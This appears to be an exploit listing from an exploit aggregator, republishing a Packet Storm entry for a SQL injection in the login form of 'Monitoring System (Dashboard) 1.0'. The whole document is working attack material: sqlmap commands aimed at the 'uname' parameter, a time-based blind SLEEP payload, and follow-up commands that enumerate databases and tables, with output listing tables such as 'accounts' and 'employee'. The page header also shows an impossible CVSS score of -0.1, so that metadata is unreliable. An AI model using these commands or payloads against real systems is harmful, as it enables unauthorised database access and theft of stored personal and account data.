Exploit for Monitoring System (Dashboard) 1.0 SQL Injection

Name: Exploit for Monitoring System (Dashboard) 1.0 SQL Injection
Rating: 5 (235 reviews)

2021-03-12 | CVSS -0.1

## https://sploitus.com/exploit?id=PACKETSTORM:161761
# Exploit Title: Monitoring System (Dashboard) | SQL Injection (uname) parameter  
# Exploit Author: Richard Jones  
# Date: 2021-01-26  
# Vendor Homepage: https://www.sourcecodester.com/php/11741/monitoring-system-dashboard.html  
# Software Link: https://www.sourcecodester.com/download-code?nid=11741&title=Monitoring+System+%28Dashboard%29+using+PHP+with+Source+Code  
# Version: 1.0  
# Tested On: Windows 10 Home 19041 (x64_86) + XAMPP 7.2.34  
  
Steps.   
  
1. Run sqlmap  
"sqlmap -u "http://localhost/asistorage/login.php" --data="uname=a&upass=w&btnlogin=" --batch  
  
2.   
Parameter: uname (POST)  
Type: time-based blind  
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)  
Payload: uname=a' AND (SELECT 4539 FROM (SELECT(SLEEP(5)))zdoW) AND 'YWTS'='YWTS&upass=w&btnlogin=  
  
  
Exploit paths:   
  
Database:   
sqlmap -u "http://localhost/asistorage/login.php" --data="uname=a&upass=w&btnlogin=" --batch --dbms=mysql --dbs  
  
Tables:   
sqlmap -u "http://localhost/asistorage/login.php" --data="uname=a&upass=w&btnlogin=" --batch --dbms=mysql -D asidatabase --tables  
[11 tables]  
+------------+  
| accounts |  
| attendance |  
| contacts |  
| employee |  
| gallery |  
| msexcel |  
| msppt |  
| msword |  
| oic |  
| random |  
| sign |  
+------------+